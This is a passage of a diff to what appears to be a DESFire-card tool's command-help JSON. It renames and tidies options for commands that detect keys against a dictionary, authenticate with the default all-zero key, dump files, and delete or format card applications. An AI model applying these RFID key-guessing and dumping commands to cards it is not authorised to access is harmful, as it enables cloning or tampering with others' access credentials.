@@ -4685,101 +4741,101 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of delegated application (3 hex bytes, big endian)" - ], - "usage": "hf mfdes deleteapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of delegated application (3 hex bytes, big endian)" + ], + "usage": "hf mfdes deleteapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes deletefile": { "command": "hf mfdes deletefile", "description": "delete file from application. 
master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes deletefile --aid 123456 --fid 01 -> delete file for: app=123456, file=01 with defaults from `default` command", - "hf mfdes deletefile --appisoid df01 --fid 0f -s lrp -t aes -> delete file for lrp channel" + "hf mfdes deletefile --isoid df01 --fid 0f -s lrp -t aes -> delete file for lrp channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes deletefile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes deletefile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes 
detect": { "command": "hf mfdes detect", "description": "detect key type and tries to find one from the list.", "notes": [ "hf mfdes detect -> detect key 0 from picc level", - "hf mfdes detect -s d40 -> detect key 0 from picc level via secure channel d40", + "hf mfdes detect --schann d40 -> detect key 0 from picc level via secure channel d40", "hf mfdes detect --dict mfdes_default_keys -> detect key 0 from picc level with help of the standard dictionary", "hf mfdes detect --aid 123456 -n 2 --save -> detect key 2 from app 123456 and if succeed - save params to defaults (`default` command)", - "hf mfdes detect --appisoid df01 --save -> detect key 0 and save to defaults with card in the lrp mode" + "hf mfdes detect --isoid df01 --save -> detect key 0 and save to defaults with card in the lrp mode" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--dict file with keys dictionary", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso 
id (iso df id) (2 hex bytes, big endian).", + "--dict dictionary file name with keys", "--save save found key and parameters to defaults" ], - "usage": "hf mfdes detect [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--dict ] [--save]" + "usage": "hf mfdes detect [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--dict ] [--save]" }, "hf mfdes dump": { "command": "hf mfdes dump", "description": "for each application show fil list and then file content. key needs to be provided for authentication or flag --no-auth set (depend on cards settings).", "notes": [ - "hf mfdes dump --aid 123456 -> show file dump for: app=123456 with channel defaults from `default` command/nhf mfdes dump --appisoid df01 -s lrp -t aes --length 000090 -> lrp default settings with length limit" + "hf mfdes dump --aid 123456 -> show file dump for: app=123456 with channel defaults from `default` command/nhf mfdes dump --isoid df01 -s lrp -t aes --length 000090 -> lrp default settings with length limit" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "-l, --length maximum length for read data files (3 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 
24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "-l, --length maximum length for read data files (3 hex bytes, big endian)", "--no-auth execute without authentication" ], - "usage": "hf mfdes dump [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [-l ] [--no-auth]" + "usage": "hf mfdes dump [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [-l ] [--no-auth]" }, "hf mfdes formatpicc": { "command": "hf mfdes formatpicc", 
@@ -4791,18 +4847,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of delegated application (3 hex bytes, big endian)" - ], - "usage": "hf mfdes formatpicc [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of delegated application (3 hex bytes, big endian)" + ], + "usage": "hf mfdes formatpicc [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes freemem": { "command": "hf mfdes freemem", 
@@ -4814,146 +4870,146 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfreemem [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getfreemem [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getaids": { "command": "hf mfdes getaids", "description": "get application ids list from card. 
master key needs to be provided or flag --no-auth set.", "notes": [ - "hf mfdes getaids -n 0 -t des -k 0000000000000000 -f none -> execute with default factory setup" + "hf mfdes getaids -n 0 -t des -k 0000000000000000 --kdf none -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getaids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getaids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getappnames": { "command": "hf mfdes getappnames", "description": "get application ids, iso ids and df names from card. 
master key needs to be provided or flag --no-auth set.", "notes": [ - "hf mfdes getappnames -n 0 -t des -k 0000000000000000 -f none -> execute with default factory setup" + "hf mfdes getappnames -n 0 -t des -k 0000000000000000 --kdf none -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getappnames [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getappnames [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getfileids": { "command": "hf mfdes getfileids", "description": "get file ids list from card. 
master key needs to be provided or flag --no-auth set.", "notes": [ "hf mfdes getfileids --aid 123456 -> execute with defaults from `default` command", - "hf mfdes getfileids -n 0 -t des -k 0000000000000000 -f none --aid 123456 -> execute with default factory setup" + "hf mfdes getfileids -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfileids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes getfileids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes getfileisoids": { "command": "hf mfdes getfileisoids", "description": "get file ids list from card. 
master key needs to be provided or flag --no-auth set.", "notes": [ "hf mfdes getfileisoids --aid 123456 -> execute with defaults from `default` command", - "hf mfdes getfileisoids -n 0 -t des -k 0000000000000000 -f none --aid 123456 -> execute with default factory setup", - "hf mfdes getfileisoids --appisoid df01 -> get iso file ids from desfire light with factory card settings", - "hf mfdes getfileisoids --appisoid df01 -s lrp -t aes -> get iso file ids from desfire light via lrp channel with default key authentication" + "hf mfdes getfileisoids -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 -> execute with default factory setup", + "hf mfdes getfileisoids --isoid df01 -> get iso file ids from desfire light with factory card settings", + "hf mfdes getfileisoids --isoid df01 -s lrp -t aes -> get iso file ids from desfire light via lrp channel with default key authentication" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 
hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfileisoids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes getfileisoids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes getfilesettings": { "command": "hf mfdes getfilesettings", "description": "get file settings from file from application. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes getfilesettings --aid 123456 --fid 01 -> execute with defaults from `default` command", - "hf mfdes getfilesettings --appisoid df01 --fid 00 --no-auth -> get file settings with select by iso id", - "hf mfdes getfilesettings -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup" + "hf mfdes getfilesettings --isoid df01 --fid 00 --no-auth -> get file settings with select by iso id", + "hf mfdes getfilesettings -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte). 
default: 1", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte). (def: 1)", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfilesettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes getfilesettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes getkeysettings": { "command": "hf mfdes getkeysettings", 
@@ -4966,18 +5022,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)" - ], - "usage": "hf mfdes getkeysettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)" + ], + "usage": "hf mfdes getkeysettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes getkeyversions": { "command": "hf mfdes getkeyversions", 
@@ -4992,47 +5048,47 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number for authentication", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--keynum key number/count (hex 1 byte). default 0x00.", - "--keyset keyset number (hex 1 byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number for authentication", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "--keynum key number/count (1 hex byte). (def: 0x00)", + "--keyset keyset number (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes getkeyversions [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--keynum ] [--keyset ] [--no-auth]" + "usage": "hf mfdes getkeyversions [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--keynum ] [--keyset ] [--no-auth]" }, "hf mfdes getuid": { "command": "hf mfdes getuid", "description": "get uid from card. get the real uid if the random uid bit is on and get the same uid as in anticollision if not. 
any card's key needs to be provided.", "notes": [ "hf mfdes getuid -> execute with default factory setup", - "hf mfdes getuid --appisoid df01 -t aes -s lrp -> for desfire lights default settings" + "hf mfdes getuid --isoid df01 -t aes -s lrp -> for desfire lights default settings" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian)." - ], - "usage": "hf mfdes getuid [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)" + ], + "usage": "hf mfdes getuid [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ]" }, "hf mfdes help": { "command": "hf mfdes help", 
@@ -5072,51 +5128,51 @@ "description": "show application list. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes lsapp -> show application list with defaults from `default` command", - "hf mfdes lsapp --files -> show application list and show each file type/settings/etc for each application" + "hf mfdes lsapp --files -> show application list and show each file type/settings/etc" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication", "--no-deep not to check authentication commands that avail for any application", - "--files scan files and print file settings for each application" + "--files scan files and print file settings" ], - "usage": "hf mfdes lsapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth] [--no-deep] [--files]" + "usage": "hf mfdes lsapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth] [--no-deep] [--files]" }, "hf mfdes lsfiles": { "command": "hf mfdes lsfiles", "description": "show file list. 
master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ - "hf mfdes lsfiles --aid 123456 -> show file list for: app=123456 with defaults from `default` commandhf mfdes lsfiles --appisoid df01 --no-auth -> show files from desfire light" + "hf mfdes lsfiles --aid 123456 -> show file list for: app=123456 with defaults from `default` commandhf mfdes lsfiles --isoid df01 --no-auth -> show files from desfire light" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", "--no-auth execute without authentication" ], - "usage": "hf mfdes lsfiles [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes lsfiles [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes mad": { "command": "hf mfdes mad", 
@@ -5133,19 +5189,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of issuer info file, (non-standard feature!) (3 hex bytes, big endian)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of issuer info file, (3 hex bytes, big endian), (non-standard feature!)", "--auth authenticate to get info from getapplicationids command (non-standard feature!)" ], - "usage": "hf mfdes mad [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--auth]" + "usage": "hf mfdes mad [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--auth]" }, "hf mfdes read": { "command": "hf mfdes 